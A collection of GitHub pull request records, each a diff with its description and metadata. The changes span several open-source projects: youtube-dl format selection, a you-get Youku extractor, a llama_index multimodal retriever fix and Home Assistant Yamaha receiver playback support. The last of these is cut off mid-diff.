diff --git a/README.md b/README.md index cae88b7f..26826484 100644 --- a/README.md +++ b/README.md @@ -14,6 +14,8 @@ For a list of free machine learning books available for download, go [here](http <!-- MarkdownTOC depth=4 --> +- [APL](#apl) + - [General-Purpose Machine Learning](#apl-general-purpose) - [C](#c) - [General-Purpose Machine Learning](#c-general-purpose) - [Computer Vision](#c-cv) @@ -106,6 +108,13 @@ For a list of free machine learning books available for download, go [here](http <!-- /MarkdownTOC --> +<a name="apl" /> +## APL + +<a name="apl-general-purpose" /> +#### General-Purpose Machine Learning +* [naive-apl](https://github.com/mattcunningham/naive-apl) - Naive Bayesian Classifier implementation in APL + <a name="c" /> ## C
Adding a naive Bayesian classifier written in APL
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/280
2016-05-25T13:26:03Z
2016-05-25T13:35:52Z
2016-05-25T13:35:52Z
2016-05-25T13:35:57Z
243
josephmisiti/awesome-machine-learning
52,237
Add a comment about lowercase env. variables precedence over uppercase
diff --git a/requests/utils.py b/requests/utils.py index 3f50d485d9..07f8c7f764 100644 --- a/requests/utils.py +++ b/requests/utils.py @@ -696,6 +696,8 @@ def should_bypass_proxies(url, no_proxy): :rtype: bool """ + # Prioritize lowercase environment variables over uppercase + # to keep a consistent behaviour with other http projects (curl, wget). get_proxy = lambda k: os.environ.get(k) or os.environ.get(k.upper()) # First check whether no_proxy is defined. If it is, check that the URL
As suggested by @sigmavirus24 for the follow-up of issue #4579
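As a quick sketch of the precedence behaviour this comment documents (the lambda mirrors the one in `requests/utils.py`; the sample proxy values are made up for illustration):

```python
import os

# Minimal sketch of the rule: the lowercase variable wins over the uppercase
# one, matching curl and wget behaviour. Sample values are invented.
get_proxy = lambda k: os.environ.get(k) or os.environ.get(k.upper())

os.environ["HTTP_PROXY"] = "http://upper-proxy:3128"
os.environ["http_proxy"] = "http://lower-proxy:3128"

assert get_proxy("http_proxy") == "http://lower-proxy:3128"
```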
https://api.github.com/repos/psf/requests/pulls/4583
2018-04-11T22:59:58Z
2018-05-13T13:15:57Z
2018-05-13T13:15:57Z
2021-09-03T00:11:00Z
147
psf/requests
32,160
P.3: Fixed an inaccurate description of `for (const auto& x : v)`.
diff --git a/CppCoreGuidelines.md b/CppCoreGuidelines.md index fbbd9f5c8..51d0cd7be 100644 --- a/CppCoreGuidelines.md +++ b/CppCoreGuidelines.md @@ -464,7 +464,7 @@ Better: for (const auto& x : v) { /* do something with x */ } -Now, there is no explicit mention of the iteration mechanism, and the loop operates on a copy of elements so that accidental modification cannot happen. If modification is desired, say so: +Now, there is no explicit mention of the iteration mechanism, and the loop operates on a reference to `const` elements so that accidental modification cannot happen. If modification is desired, say so: for (auto& x : v) { /* do something with x */ }
https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/441
2015-12-10T12:48:05Z
2015-12-11T16:12:59Z
2015-12-11T16:12:59Z
2015-12-11T17:32:32Z
185
isocpp/CppCoreGuidelines
15,752
Make 'best' format only match non-DASH formats (closes #5554)
diff --git a/test/test_YoutubeDL.py b/test/test_YoutubeDL.py index bb4a65ee182..82b827536d7 100644 --- a/test/test_YoutubeDL.py +++ b/test/test_YoutubeDL.py @@ -237,7 +237,7 @@ def test_youtube_format_selection(self): f2['url'] = 'url:' + f2id info_dict = _make_result([f1, f2], extractor='youtube') - ydl = YDL() + ydl = YDL({'format': 'best/bestvideo'}) yie = YoutubeIE(ydl) yie._sort_formats(info_dict['formats']) ydl.process_ie_result(info_dict) @@ -245,7 +245,7 @@ def test_youtube_format_selection(self): self.assertEqual(downloaded['format_id'], f1id) info_dict = _make_result([f2, f1], extractor='youtube') - ydl = YDL() + ydl = YDL({'format': 'best/bestvideo'}) yie = YoutubeIE(ydl) yie._sort_formats(info_dict['formats']) ydl.process_ie_result(info_dict) diff --git a/youtube_dl/YoutubeDL.py b/youtube_dl/YoutubeDL.py index 827c88e0d9e..eee9c015435 100755 --- a/youtube_dl/YoutubeDL.py +++ b/youtube_dl/YoutubeDL.py @@ -915,7 +915,14 @@ def select_format(self, format_spec, available_formats): return None if format_spec == 'best' or format_spec is None: - return available_formats[-1] + audiovideo_formats = [ + f for f in available_formats + if f.get('vcodec') != 'none' and f.get('acodec') != 'none'] + if audiovideo_formats: + return audiovideo_formats[-1] + # for audio only urls, 'best' selects the best audio format + elif all(f.get('acodec') != 'none' for f in available_formats): + return available_formats[-1] elif format_spec == 'worst': audiovideo_formats = [ f for f in available_formats
Otherwise it's impossible to only download non-DASH formats; for example, `best[height=?480]/best` would download a DASH video if it's the only one with height=480, instead of falling back to the second format specifier. For audio-only URLs (soundcloud, bandcamp ...), the best audio will be downloaded as before.
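A minimal, standalone sketch of the selection rule this change implements (the dict keys mirror youtube-dl's format dictionaries, but the helper name and sample formats are invented for illustration, not the actual youtube-dl code):

```python
# Prefer formats that carry both audio and video; only fall back to the full
# list for audio-only extractors.
def pick_best(available_formats):
    # available_formats is assumed sorted worst-to-best, as youtube-dl does
    audiovideo = [
        f for f in available_formats
        if f.get('vcodec') != 'none' and f.get('acodec') != 'none'
    ]
    if audiovideo:
        return audiovideo[-1]
    # audio-only URLs (soundcloud, bandcamp, ...): best audio as before
    if all(f.get('acodec') != 'none' for f in available_formats):
        return available_formats[-1]
    return None


formats = [
    {'format_id': 'http-480p', 'vcodec': 'h264', 'acodec': 'aac'},
    {'format_id': 'dash-1080p', 'vcodec': 'vp9', 'acodec': 'none'},
]
assert pick_best(formats)['format_id'] == 'http-480p'
```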
https://api.github.com/repos/ytdl-org/youtube-dl/pulls/5556
2015-04-29T20:57:40Z
2015-04-30T14:57:02Z
2015-04-30T14:57:02Z
2015-04-30T18:16:12Z
495
ytdl-org/youtube-dl
50,184
Acfun: Fix Youku COOP ct85&86
diff --git a/src/you_get/extractors/acfun.py b/src/you_get/extractors/acfun.py old mode 100644 new mode 100755 index e78d363627..983606d42f --- a/src/you_get/extractors/acfun.py +++ b/src/you_get/extractors/acfun.py @@ -8,7 +8,7 @@ from .qq import qq_download_by_vid from .sina import sina_download_by_vid from .tudou import tudou_download_by_iid -from .youku import youku_download_by_vid +from .youku import youku_download_by_vid, youku_open_download_by_vid import json, re @@ -32,14 +32,11 @@ def acfun_download_by_vid(vid, title, output_dir='.', merge=True, info_only=Fals elif sourceType == 'letv': letvcloud_download_by_vu(sourceId, '2d8c027396', title, output_dir=output_dir, merge=merge, info_only=info_only) elif sourceType == 'zhuzhan': - a = 'http://api.aixifan.com/plays/%s/realSource' % vid - s = json.loads(get_content(a, headers={'deviceType': '1'})) - urls = s['data']['files'][-1]['url'] - size = urls_size(urls) - print_info(site_info, title, 'mp4', size) - if not info_only: - download_urls(urls, title, 'mp4', size, - output_dir=output_dir, merge=merge) + a = 'http://api.aixifan.com/plays/%s' % vid + s = json.loads(get_content(a, headers={'deviceType': '2'})) + if s['data']['source'] == "zhuzhan-youku": + sourceId = s['data']['sourceId'] + youku_open_download_by_vid(client_id='908a519d032263f8', vid=sourceId, title=title, output_dir=output_dir, merge=merge, info_only=info_only, **kwargs) else: raise NotImplementedError(sourceType) diff --git a/src/you_get/extractors/youku.py b/src/you_get/extractors/youku.py index 3135e82251..fefaf5ee68 100644 --- a/src/you_get/extractors/youku.py +++ b/src/you_get/extractors/youku.py @@ -28,7 +28,11 @@ class Youku(VideoExtractor): f_code_1 = 'becaf9be' f_code_2 = 'bf7e5f01' + ctype = 12 #differ from 86 + def trans_e(a, c): + """str, str->str + This is an RC4 encryption.""" f = h = 0 b = list(range(256)) result = '' @@ -49,14 +53,14 @@ def trans_e(a, c): return result - def generate_ep(no, streamfileids, sid, token): + def generate_ep(self, no, streamfileids, sid, token): number = hex(int(str(no), 10))[2:].upper() if len(number) == 1: number = '0' + number fileid = streamfileids[0:8] + number + streamfileids[10:] ep = parse.quote(base64.b64encode( - ''.join(Youku.trans_e( - Youku.f_code_2, + ''.join(self.__class__.trans_e( + self.f_code_2, #use the 86 fcode if using 86 sid + '_' + fileid + '_' + token)).encode('latin1')), safe='~()*!.\'' ) @@ -150,8 +154,17 @@ def prepare(self, **kwargs): self.download_playlist_by_url(self.url, **kwargs) exit(0) - api_url = 'http://play.youku.com/play/get.json?vid=%s&ct=10' % self.vid - api12_url = 'http://play.youku.com/play/get.json?vid=%s&ct=12' % self.vid + #HACK! 
+ if 'api_url' in kwargs: + api_url = kwargs['api_url'] #85 + api12_url = kwargs['api12_url'] #86 + self.ctype = kwargs['ctype'] + self.title = kwargs['title'] + + else: + api_url = 'http://play.youku.com/play/get.json?vid=%s&ct=10' % self.vid + api12_url = 'http://play.youku.com/play/get.json?vid=%s&ct=12' % self.vid + try: meta = json.loads(get_content( api_url, @@ -187,7 +200,8 @@ def prepare(self, **kwargs): else: log.wtf('[Failed] Video not found.') - self.title = data['video']['title'] + if not self.title: #86 + self.title = data['video']['title'] self.ep = data12['security']['encrypt_string'] self.ip = data12['security']['ip'] @@ -264,7 +278,7 @@ def extract(self, **kwargs): stream_id = self.streams_sorted[0]['id'] e_code = self.__class__.trans_e( - self.__class__.f_code_1, + self.f_code_1, base64.b64decode(bytes(self.ep, 'ascii')) ) sid, token = e_code.split('_') @@ -279,10 +293,10 @@ def extract(self, **kwargs): for no in range(0, len(segs)): k = segs[no]['key'] if k == -1: break # we hit the paywall; stop here - fileid, ep = self.__class__.generate_ep(no, streamfileid, + fileid, ep = self.__class__.generate_ep(self, no, streamfileid, sid, token) q = parse.urlencode(dict( - ctype = 12, + ctype = self.ctype, ev = 1, K = k, ep = parse.unquote(ep), @@ -312,9 +326,40 @@ def extract(self, **kwargs): if not kwargs['info_only']: self.streams[stream_id]['src'] = ksegs + def open_download_by_vid(self, client_id, vid, **kwargs): + """self, str, str, **kwargs->None + Override the original one with VideoExtractor. + Most of the credit are to @ERioK, who gave his POC.""" + self.f_code_1 = '10ehfkbv' #can be retrived by running r.translate with the keys and the list e + self.f_code_2 = 'msjv7h2b' + self.url = None + self.vid = vid + self.name = "优酷开放平台 (Youku COOP)" + + #A little bit of work before self.prepare + sign_url = "https://api.youku.com/players/custom.json?client_id={client_id}&video_id={video_id}".format(client_id = client_id, video_id = vid) + playsign = json.loads(get_content(sign_url))['playsign'] + + api85_url = 'http://play.youku.com/partner/get.json?cid={client_id}&vid={vid}&ct=85&sign={playsign}'.format(client_id = client_id, vid = vid, playsign = playsign) + api86_url = 'http://play.youku.com/partner/get.json?cid={client_id}&vid={vid}&ct=86&sign={playsign}'.format(client_id = client_id, vid = vid, playsign = playsign) + + self.prepare(api_url = api85_url, api12_url = api86_url, ctype = 86, **kwargs) + if 'extractor_proxy' in kwargs and kwargs['extractor_proxy']: + unset_proxy() + + try: + self.streams_sorted = [dict([('id', stream_type['id'])] + list(self.streams[stream_type['id']].items())) for stream_type in self.__class__.stream_types if stream_type['id'] in self.streams] + except: + self.streams_sorted = [dict([('itag', stream_type['itag'])] + list(self.streams[stream_type['itag']].items())) for stream_type in self.__class__.stream_types if stream_type['itag'] in self.streams] + + self.extract(**kwargs) + + self.download(**kwargs) + site = Youku() download = site.download_by_url download_playlist = site.download_playlist_by_url youku_download_by_vid = site.download_by_vid +youku_open_download_by_vid = site.open_download_by_vid # Used by: acfun.py bilibili.py miomio.py tudou.py
So long everyone. I apologize for the long delay due to unexpected physical and psychological conditions. Also I want to thank for @zhangn1985 's enlightening discussions and @soimort 's effort. Specially I give the credit to @ERioK 's POC which guided me through this patch. There are more people I want to thank then who I could remember. Thanks a lot. Beining ``` $ python3 you-get -di http://www.acfun.tv/v/ac2701527 [DEBUG] get_content: http://api.aixifan.com/plays/3462634 [DEBUG] get_content: https://api.youku.com/players/custom.json?client_id=908a519d032263f8&video_id=CMzQyMjc0NA== [DEBUG] get_content: http://play.youku.com/partner/get.json?cid=908a519d032263f8&vid=CMzQyMjc0NA==&ct=85&sign=MXwxNDYxODIxNTAyfDI0MzZkOTYwMDNlMTIwMDRlZTg1OTRhZTAzZjI0OTc5 [DEBUG] get_content: http://play.youku.com/partner/get.json?cid=908a519d032263f8&vid=CMzQyMjc0NA==&ct=86&sign=MXwxNDYxODIxNTAyfDI0MzZkOTYwMDNlMTIwMDRlZTg1OTRhZTAzZjI0OTc5 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0057203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FieiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=e7b5adeb3ee29562261efae3&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0157203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiaiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=69adefdb458eb9f6261efae3&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0257203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiWiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=47012544122ae5a5282b5f3e&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0357203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiSiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=768415ccc619f0ae24129688&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0457203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiOiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=0f4c8142e2146fd6282b5f3e&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0557203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiKiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=a063d082ee92e290282b5f3e&yxon=1&ev=1&token=2412 [DEBUG] get_content: 
http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0657203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiGiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=5e26320e138989f1261efae3&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0757203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FiCiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=e93aa4c00e75bbaf282b5f3e&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0857203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2Fi%2BiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=25a3be5f1e829b20261efae3&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0957203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2Fi6iMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=58d1c740228579b924129688&yxon=1&ev=1&token=2412 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/946182150401686da3f3a_00/st/flv/fileid/0300010B0A57203D92EA8F2D9B7D2F561017A4-4E51-68F3-B5BC-23EBF9BBC4EF?oip=1176176655&ep=Bp5ccxwBzLlAG0%2FH6Ajc9BK2CHGLmE%2FI6YrkNt1v%2FlaiMqPqcylWvjS%2BJqkjN%2BP0ZzFvyk5pKqrRS1WSpdbnHJUPMfc3tDsJUJSOPVINsHf9OlYhsfDP2VDSqqnS&ctype=86&K=3bc2288ce30f886b24129688&yxon=1&ev=1&token=2412 site: 优酷 (Youku) title: 马猴烧酒变身第三期 streams: # Available quality and codecs [ DEFAULT ] _________________________________ - format: hd2 container: flv video-profile: 超清 size: 389.0 MiB (407922611 bytes) # download-with: you-get --format=hd2 [URL] - format: mp4 container: mp4 video-profile: 高清 size: 223.9 MiB (234784857 bytes) # download-with: you-get --format=mp4 [URL] - format: flvhd container: flv video-profile: 标清 size: 120.2 MiB (126072622 bytes) # download-with: you-get --format=flvhd [URL] - format: 3gphd container: 3gp video-profile: 标清(3GP) size: 99.5 MiB (104342150 bytes) # download-with: you-get --format=3gphd [URL] ``` Proof of not breaking something else: ``` $ python3 you-get -di http://v.youku.com/v_show/id_XMTU1MDY0MTg4MA==.html [DEBUG] get_content: http://play.youku.com/play/get.json?vid=XMTU1MDY0MTg4MA==&ct=10 [DEBUG] get_content: http://play.youku.com/play/get.json?vid=XMTU1MDY0MTg4MA==&ct=12 [DEBUG] get_content: http://k.youku.com/player/getFlvPath/sid/146182110826612086532_00/st/flv/fileid/0300010100572158EEAE482FBE416E02DD9552-3701-5ECF-B0A2-6E41CB731195?ev=1&oip=1176176655&yxon=1&ep=cyaSG0GPV88A7SHZjj8bZyTkcXQNXP4J9h%2BFgNJjALshT%2Bq%2BnDaksuzFSvdAYItsdiMAZevz36Tub0UWYfNEqWkQ2jvbT%2FqS%2FoHh5asmwJFzFB41c8zesVSeSjP1&token=0934&K=8f7454d8aba2a1df24129688&ctype=12 [DEBUG] get_content: 
http://k.youku.com/player/getFlvPath/sid/146182110826612086532_00/st/flv/fileid/0300010100568BC189B4DD000032C8E64C9A66-35BF-D190-178B-E37C4F851173?ev=1&oip=1176176655&yxon=1&ep=cyaSG0GPV88A7SHZjj8bZyTkcXQNXP4J9h%2BFgNJjALshTuDN6j%2FZzu%2B0OotCFvkZcSB1GJ73r6PuG0YSYfNG2x4Qq0%2BhOfrh%2BfiR5dhQw%2BMEEBEzc8zQt1SeSjP1&token=0934&K=b13669cc4988e60b24129688&ctype=12 site: 优酷 (Youku) title: 实拍3名和尚寺庙内打架 住持发朋友圈:全开除 streams: # Available quality and codecs [ DEFAULT ] _________________________________ - format: hd2 container: flv video-profile: 超清 size: 13.9 MiB (14586247 bytes) # download-with: you-get --format=hd2 [URL] - format: mp4 container: mp4 video-profile: 高清 size: 7.6 MiB (7951724 bytes) # download-with: you-get --format=mp4 [URL] - format: flvhd container: flv video-profile: 标清 size: 3.9 MiB (4114669 bytes) # download-with: you-get --format=flvhd [URL] ``` <!-- Reviewable:start --> --- This change is [<img src="https://reviewable.io/review_button.svg" height="35" align="absmiddle" alt="Reviewable"/>](https://reviewable.io/reviews/soimort/you-get/1089) <!-- Reviewable:end -->
https://api.github.com/repos/soimort/you-get/pulls/1089
2016-04-28T05:41:07Z
2016-04-28T05:44:08Z
2016-04-28T05:44:08Z
2016-05-17T20:02:23Z
2,030
soimort/you-get
21,469
Solve Empty Text Vector Store with MM vector stores. Update MM docs
diff --git a/docs/module_guides/models/multi_modal.md b/docs/module_guides/models/multi_modal.md index b51dcec4e022e..166164bdf70d5 100644 --- a/docs/module_guides/models/multi_modal.md +++ b/docs/module_guides/models/multi_modal.md @@ -47,17 +47,23 @@ from llama_index import ( # Create a local Qdrant vector store client = qdrant_client.QdrantClient(path="qdrant_mm_db") +# if you only need image_store for image retrieval, +# you can remove text_sotre text_store = QdrantVectorStore( client=client, collection_name="text_collection" ) image_store = QdrantVectorStore( client=client, collection_name="image_collection" ) + +# if you only need image_store for image retrieval, +# don't need to pass text_store for StorageContext storage_context = StorageContext.from_defaults(vector_store=text_store) +# storage_context = StorageContext.from_defaults() -# Create the MultiModal index +# Load text and image documents from local folder documents = SimpleDirectoryReader("./data_folder/").load_data() - +# Create the MultiModal index index = MultiModalVectorStoreIndex.from_documents( documents, storage_context=storage_context, image_vector_store=image_store ) @@ -140,7 +146,7 @@ Below table lists some vector stores supporting Multi-Modal use cases. Our Llama ## Multi-Modal LLM Modules -We support integrations with GPT-4V, LLaVA, Fuyu-8B, CLIP, and more. +We support integrations with GPT4-V, CLIP (OpenAI), BLIP (Salesforce), and Replicate (LLaVA, Fuyu-8B, MiniGPT-4, CogVLM), and more. ```{toctree} --- diff --git a/llama_index/indices/multi_modal/retriever.py b/llama_index/indices/multi_modal/retriever.py index 3d7ad8bea3036..284a4a41fe556 100644 --- a/llama_index/indices/multi_modal/retriever.py +++ b/llama_index/indices/multi_modal/retriever.py @@ -117,10 +117,16 @@ def _retrieve( self, query_bundle: QueryBundle, ) -> List[NodeWithScore]: - res = self._text_retrieve(query_bundle) - # using text to image retrievel here for image retrieval - # users can also use image_to_image retrieval - res.extend(self._text_to_image_retrieve(query_bundle)) + res = [] + # If text vector store is not empty, retrieve text nodes + # If text vector store is empty, please create index without text vector store + if self._vector_store.stores_text: + res.extend(self._text_retrieve(query_bundle)) + + # If image vector store is not empty, retrieve text nodes + # If image vector store is empty, please create index without image vector store + if self._image_vector_store.stores_text: + res.extend(self._text_to_image_retrieve(query_bundle)) return res def _text_retrieve(
# Description * Fix the MM vector store issue when only an image store is used, so users can query the image vector index without a text vector index * Update the MM docs to reflect this in the guideline, so users can query only the image vector index Fixes # (issue) ## Type of Change Please delete options that are not relevant. - [x] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected) - [ ] This change requires a documentation update # How Has This Been Tested? Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration - [x] Added new unit/integration tests - [ ] Added new notebook (that tests end-to-end) - [ ] I stared at the code and made sure it makes sense # Suggested Checklist: - [ ] I have performed a self-review of my own code - [ ] I have commented my code, particularly in hard-to-understand areas - [ ] I have made corresponding changes to the documentation - [ ] I have added Google Colab support for the newly added notebooks. - [ ] My changes generate no new warnings - [ ] I have added tests that prove my fix is effective or that my feature works - [ ] New and existing unit tests pass locally with my changes - [ ] I ran `make format; make lint` to appease the lint gods
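A hedged usage sketch of the image-only setup this change enables, adapted from the docs snippet in the diff; the import paths are assumptions and may differ between llama_index versions:

```python
import qdrant_client
from llama_index import SimpleDirectoryReader, StorageContext
from llama_index.indices.multi_modal import MultiModalVectorStoreIndex
from llama_index.vector_stores import QdrantVectorStore

client = qdrant_client.QdrantClient(path="qdrant_mm_db")

# Only an image collection is created; no text_store is passed to the
# StorageContext, so the empty default text store is skipped at retrieval time.
image_store = QdrantVectorStore(client=client, collection_name="image_collection")
storage_context = StorageContext.from_defaults()

documents = SimpleDirectoryReader("./data_folder/").load_data()
index = MultiModalVectorStoreIndex.from_documents(
    documents, storage_context=storage_context, image_vector_store=image_store
)
```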
https://api.github.com/repos/run-llama/llama_index/pulls/9306
2023-12-05T03:41:18Z
2023-12-05T03:49:06Z
2023-12-05T03:49:05Z
2023-12-05T03:49:06Z
712
run-llama/llama_index
6,674
Improve support for Yamaha receiver
diff --git a/homeassistant/components/media_player/yamaha.py b/homeassistant/components/media_player/yamaha.py index 027fd6077309..9679c9f186c5 100644 --- a/homeassistant/components/media_player/yamaha.py +++ b/homeassistant/components/media_player/yamaha.py @@ -10,13 +10,15 @@ from homeassistant.components.media_player import ( SUPPORT_TURN_OFF, SUPPORT_TURN_ON, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_SET, - SUPPORT_SELECT_SOURCE, SUPPORT_PLAY_MEDIA, + SUPPORT_SELECT_SOURCE, SUPPORT_PLAY_MEDIA, SUPPORT_PAUSE, SUPPORT_STOP, + SUPPORT_NEXT_TRACK, SUPPORT_PREVIOUS_TRACK, MEDIA_TYPE_MUSIC, MediaPlayerDevice, PLATFORM_SCHEMA) -from homeassistant.const import (CONF_NAME, CONF_HOST, STATE_OFF, STATE_ON) +from homeassistant.const import (CONF_NAME, CONF_HOST, STATE_OFF, STATE_ON, + STATE_PLAYING, STATE_IDLE) import homeassistant.helpers.config_validation as cv -REQUIREMENTS = ['rxv==0.2.0'] +REQUIREMENTS = ['rxv==0.3.0'] _LOGGER = logging.getLogger(__name__) @@ -24,6 +26,10 @@ SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_SELECT_SOURCE | \ SUPPORT_PLAY_MEDIA +# Only supported by some sources +SUPPORT_PLAYBACK = SUPPORT_PLAY_MEDIA | SUPPORT_PAUSE | SUPPORT_STOP | \ + SUPPORT_PREVIOUS_TRACK | SUPPORT_NEXT_TRACK + CONF_SOURCE_NAMES = 'source_names' CONF_SOURCE_IGNORE = 'source_ignore' @@ -76,16 +82,25 @@ def __init__(self, name, receiver, source_ignore, source_names): self._source_ignore = source_ignore self._source_names = source_names self._reverse_mapping = None + self._is_playback_supported = False + self._play_status = None self.update() self._name = name self._zone = receiver.zone def update(self): """Get the latest details from the device.""" + self._play_status = self._receiver.play_status() if self._receiver.on: - self._pwstate = STATE_ON + if self._play_status is None: + self._pwstate = STATE_ON + elif self._play_status.playing: + self._pwstate = STATE_PLAYING + else: + self._pwstate = STATE_IDLE else: self._pwstate = STATE_OFF + self._muted = self._receiver.mute self._volume = (self._receiver.volume / 100) + 1 @@ -95,6 +110,8 @@ def update(self): current_source = self._receiver.input self._current_source = self._source_names.get( current_source, current_source) + self._is_playback_supported = self._receiver.is_playback_supported( + self._current_source) def build_source_list(self): """Build the source list.""" @@ -143,7 +160,10 @@ def source_list(self): @property def supported_media_commands(self): """Flag of media commands that are supported.""" - return SUPPORT_YAMAHA + supported_commands = SUPPORT_YAMAHA + if self._is_playback_supported: + supported_commands |= SUPPORT_PLAYBACK + return supported_commands def turn_off(self): """Turn off media player.""" @@ -164,6 +184,34 @@ def turn_on(self): self._receiver.on = True self._volume = (self._receiver.volume / 100) + 1 + def media_play(self): + """Send play commmand.""" + self._call_playback_function(self._receiver.play, "play") + + def media_pause(self): + """Send pause command.""" + self._call_playback_function(self._receiver.pause, "pause") + + def media_stop(self): + """Send stop command.""" + self._call_playback_function(self._receiver.stop, "stop") + + def media_previous_track(self): + """Send previous track command.""" + self._call_playback_function(self._receiver.previous, "previous track") + + def media_next_track(self): + """Send next track command.""" + self._call_playback_function(self._receiver.next, "next track") + + def _call_playback_function(self, function, function_text): + import rxv + try: + function() + except 
rxv.exceptions.ResponseException: + _LOGGER.warning( + 'Failed to execute %s on %s', function_text, self._name) + def select_source(self, source): """Select input source.""" self._receiver.input = self._reverse_mapping.get(source, source) @@ -179,23 +227,36 @@ def play_media(self, media_type, media_id, **kwargs): if media_type == "NET RADIO": self._receiver.net_radio(media_id) + @property + def media_artist(self): + """Artist of current playing media.""" + if self._play_status is not None: + return self._play_status.artist + + @property + def media_album_name(self): + """Album of current playing media.""" + if self._play_status is not None: + return self._play_status.album + @property def media_content_type(self): - """Return the media content type.""" - if self.source == "NET RADIO": + """Content type of current playing media.""" + # Loose assumption that if playback is supported, we are playing music + if self._is_playback_supported: return MEDIA_TYPE_MUSIC + return None @property def media_title(self): - """Return the media title. - - This will vary by input source, as they provide different - information in metadata. - - """ - if self.source == "NET RADIO": - info = self._receiver.play_status() - if info.song: - return "%s: %s" % (info.station, info.song) + """Artist of current playing media.""" + if self._play_status is not None: + song = self._play_status.song + station = self._play_status.station + + # If both song and station is available, print both, otherwise + # just the one we have. + 